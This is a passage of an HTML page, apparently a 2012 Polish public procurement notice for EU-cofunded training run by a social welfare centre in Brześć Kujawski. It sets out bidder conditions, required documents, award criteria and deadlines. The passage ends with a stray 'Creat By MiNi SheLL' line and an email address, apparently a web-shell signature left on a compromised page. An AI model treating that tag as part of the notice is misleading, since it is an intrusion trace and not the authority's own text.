<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnianie warunku wykonawca potwierdza poprzez posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia w wysokości 50.000,00 zł na wszystkie zdarzenia.
6.	W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 i ust. 2 ustawy - Prawo zamówień publicznych.
7.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum).
8.	W przypadku, o którym mowa w pkt 7, wykonawcy ustanawiają pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
9.	Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem (liderem).
10.	Wypełniając formularz ofertowy, jak również inne dokumenty powołujące się na wykonawcę, w miejscu np. nazwa i adres wykonawcy należy wpisać dane dotyczące konsorcjum, a nie pełnomocnika konsorcjum.
11.	Jeżeli oferta wykonawców występujących wspólnie zostanie wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
12.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w punktach od 1 do 5 winien spełniać, co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy łącznie.
13.	Warunek określony w pkt 6 powinien spełniać każdy z wykonawców samodzielnie.
14.	Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
15.	Ocenę spełniania warunków podmiotowych i przedmiotowych udziału w postępowaniu przeprowadzi komisja przetargowa po otwarciu ofert, zgodnie z formułą spełnia-nie spełnia, w oparciu o informacje zawarte w załączonych do oferty dokumentach i oświadczeniach.
16.	Zamawiający wezwie wykonawców, którzy w terminie składania ofert
1)	nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy,
2)	nie złożą pełnomocnictw,
3)	złożą wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 ustawy, zawierające błędy,
4)	złożą wadliwe pełnomocnictwa,
do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlegała będzie odrzuceniu albo konieczne będzie unieważnienie postępowania.
17.	Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane usługi wymagań, określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
18.	Zamawiający wezwie także, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień, dotyczących oświadczeń lub dokumentów wymienionych, o których mowa w art. 25 ust. 1 ustawy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	opis ośrodka szkoleniowego przeznaczonego do realizacji zajęć z bloku motywacyjnego,
2)	opis ośrodka szkoleniowego i placówek przeznaczonych do zajęć teoretycznych i praktycznych na poszczególnych kursach zawodowych,
3)	opis urządzeń technicznych niezbędnych do realizacji zajęć praktycznych na poszczególnych kursach zawodowych, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia
oraz 1)	opracowany przez wykonawcę dzienny harmonogramu szkoleń zawierający co najmniej minimum założeń programowych opisanych w załączniku nr 1 do SIWZ. Przy tworzeniu harmonogramu wymagane jest uwzględnienie liczby uczestników szkolenia, a także tematyki kursu. W harmonogramie zawarte muszą być załażenia poszczególnych zajęć z określeniem ich celu i planowanej formy przebiegu, stosowane metody i narzędzia nauczania oraz oczekiwane rezultaty, a także wskazanie osoby odpowiedzialnej za realizowane zajęcie. Wymagane jest szczegółowe określenie miejsca realizacji szkolenia. Wymagane zachowanie podziału harmonogramu na blok motywacyjny i poszczególne kursy zawodowe. Harmonogram będzie stanowił podstawę do oceny oferty przez komisję przetargową w kryterium jakość oferowanej usługi.;
2)	oświadczenie o spełnieniu wymogu dotyczącego wykupienia polis ubezpieczeniowych dla kadry;
3)	oświadczenie o spełnieniu wymogu dotyczącego wykupienia polis ubezpieczeniowych dla uczestników szkoleń;
4)	oświadczenie o zapewnieniu cateringu zgodnie z wymaganiami pkt 16 rozdziału II SIWZ;
5)	do wykazu osób mających realizować zamówienie należy dołączyć informacje na temat ich uprawnień wymaganych przepisami oraz kwalifikacji niezbędnych do wykonywania zamówienia z określeniem funkcji przewidzianej w realizacji przedmiotu umowy zgodnie z załącznikiem nr 2 do SIWZ;
6)	życiorysy zawodowe osób podanych w wykazie;
7)	dokumenty potwierdzające uprawnienia i kwalifikacje oraz przebieg życiorysu zawodowego osób podanych w wykazie;
8)	dokumenty i oświadczenia o których mowa wyżej w ppkt od 5) do 7) stanowić będą podstawę, do oceny oferty przez komisję przetargową w kryterium jakość oferowanej usługi.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz oferty.
2.	Kalkulację ceny ofertowej.
3.	Upoważnienie do podpisania oferty (fakultatywnie, jeżeli nie wynika ono z odrębnych dokumentów).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Jakość oferowanej usługi - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzesckujawski.pl, www.bip.brzesckujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Brzeski Ośrodek Pomocy Społecznej w Brześciu  Kujawskim ul. Hanki Sawickiej 5 87-880 Brześć kujawski pokój nr 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2012 godzina 11:00, miejsce: Brzeski Ośrodek Pomocy Społecznej w Brześciu  Kujawskim ul Hanki Sawickiej 5 87-880 Brześć kujawski pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane w ramach projektu Dobry wybór - Aktywność z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013; Priorytet VII - Promocja Aktywnej Integracji; Działanie 7.1. - Rozwój i upowszechnianie aktywnej integracji; Poddziałanie 7.1.1. - Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com